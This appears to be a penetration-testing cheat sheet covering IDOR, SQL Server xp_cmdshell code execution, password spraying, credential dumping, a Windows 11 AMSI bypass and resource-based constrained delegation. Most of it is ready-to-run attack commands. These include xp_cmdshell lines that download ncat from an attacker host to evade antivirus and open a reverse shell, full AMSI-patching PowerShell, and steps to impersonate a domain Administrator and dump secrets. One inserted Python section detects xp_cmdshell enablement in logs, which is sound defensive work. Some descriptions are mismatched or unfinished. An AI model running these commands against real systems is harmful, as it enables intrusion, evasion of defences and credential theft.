Insecure direct object references (IDOR)

In this section, we will explain what insecure direct object references (IDOR) are and describe some common vulnerabilities. Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.

For example, an authentication link of the following form may be tampered with to gain access to another user's object:

http://url/auth/token/<base64-encoded>/session_id/

RCE via SQL Server

This article describes how to enable the xp_cmdshell SQL Server configuration option. This option allows system administrators to control whether the xp_cmdshell extended stored procedure can be executed on a system. By default, the xp_cmdshell option is disabled on new installations.

xp_cmdshell can be used to achieve RCE; however, sometimes this procedure is not enabled. To enable it (requires sysadmin):

EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'username', 'sysadmin';
-- stored procedures after the first statement of a batch need EXEC
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
  • prepare reverse shell
# using ncat here to avoid AV detection
EXEC xp_cmdshell 'curl -s http://ip/ncat.exe -o c:\path\ncat.exe'
EXEC xp_cmdshell 'curl -s http://ip/libssl-3.dll -o c:\path\libssl-3.dll'
EXEC xp_cmdshell 'curl -s http://ip/libcrypto-3.dll -o c:\path\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\path\ncat.exe ip 4444 -e cmd.exe'
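From the defender's side, the enablement sequence above leaves a clear trace in the SQL Server ERRORLOG, because sp_configure writes a "Configuration option '<name>' changed from X to Y" message for every option it changes. The following Python detector is an added example, not part of the original notes; the log lines are constructed samples in that message format.

```python
import re
from dataclasses import dataclass

# Constructed SQL Server ERRORLOG excerpt (not a real capture). sp_configure logs one
# "Configuration option '<name>' changed from X to Y" message per option it changes.
SAMPLE_ERRORLOG = """\
2024-03-01 10:15:02.11 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-01 10:15:02.13 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-01 10:15:03.00 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-03-01 10:20:44.50 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# Options that expose OS command execution or out-of-process access once enabled.
HIGH_RISK_OPTIONS = {"xp_cmdshell", "ole automation procedures", "ad hoc distributed queries"}

@dataclass(frozen=True)
class Finding:
    ts: str
    spid: str
    option: str
    severity: str  # "high": risky option enabled; "info": the 'show advanced options' precursor

def detect_config_enables(errorlog: str) -> list:
    """Return findings for every 0 -> non-zero change of a watched option, in log order.
    Disables (1 -> 0) and unrelated options (memory, etc.) are ignored."""
    findings = []
    for line in errorlog.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m or m["old"] != "0" or m["new"] == "0":
            continue  # not a config-change line, or not an enable transition
        name = m["option"].lower()
        if name in HIGH_RISK_OPTIONS:
            findings.append(Finding(m["ts"], m["spid"], name, "high"))
        elif name == "show advanced options":
            findings.append(Finding(m["ts"], m["spid"], name, "info"))
    return findings

def sessions_enabling_xp_cmdshell(findings: list) -> set:
    """spids that enabled 'show advanced options' and then 'xp_cmdshell' (the sequence above)."""
    seen_advanced, hits = set(), set()
    for f in findings:
        if f.option == "show advanced options":
            seen_advanced.add(f.spid)
        elif f.option == "xp_cmdshell" and f.spid in seen_advanced:
            hits.add(f.spid)
    return hits
```

Running `detect_config_enables(SAMPLE_ERRORLOG)` yields one "info" finding and one "high" finding, both from spid52, and `sessions_enabling_xp_cmdshell` returns that session; the later 1 -> 0 change on spid60 is not reported.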

SQL Server enum

  • search for possible config files
dir /s *.INI
  • password spray using crackmapexec
> crackmapexec smb target -u users.txt -p passwords.txt
  • run a command as another user with RunasCs
.\RunasCs.exe username password cmd.exe -r ip:port

Memory dump analysis

If the operating system crashes, you may need to generate a complete memory dump to provide additional information to the technical support team. Developers can then use the dump file to understand why the crash occurred and provide an accurate solution to the issue.

  • extract local secrets from exported SAM, SYSTEM and SECURITY hives
> impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

AMSI bypass

An Anti-Malware Scan Interface (AMSI) bypass is useful when an AV is running. Below is an example bypass for Windows 11, taken from: https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6

function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    ).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp = @()
    $assem.GetMethods() | ForEach-Object { If ($_.Name -like "Ge*P*oc*ddress") { $tmp += $_ } }
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')

    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

Resource-based Constrained Delegation

This is similar to constrained delegation, but instead of giving permissions to an object to impersonate any user against a service. Reference: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation#creating-a-computer-object

To exploit this, you need the following two tools:

Create a new attacker-controlled machine account

New-MachineAccount -MachineAccount newmachine -Password $(ConvertTo-SecureString 'password' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer newmachine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Get a ticket as Administrator

> impacket-getST -spn 'cifs/dc.target' -impersonate 'Administrator' 'domain/newmachine$:password' -dc-ip dc.target

Dump secrets

KRB5CCNAME=Administrator.ccache impacket-secretsdump domain/administrator@target -k -no-pass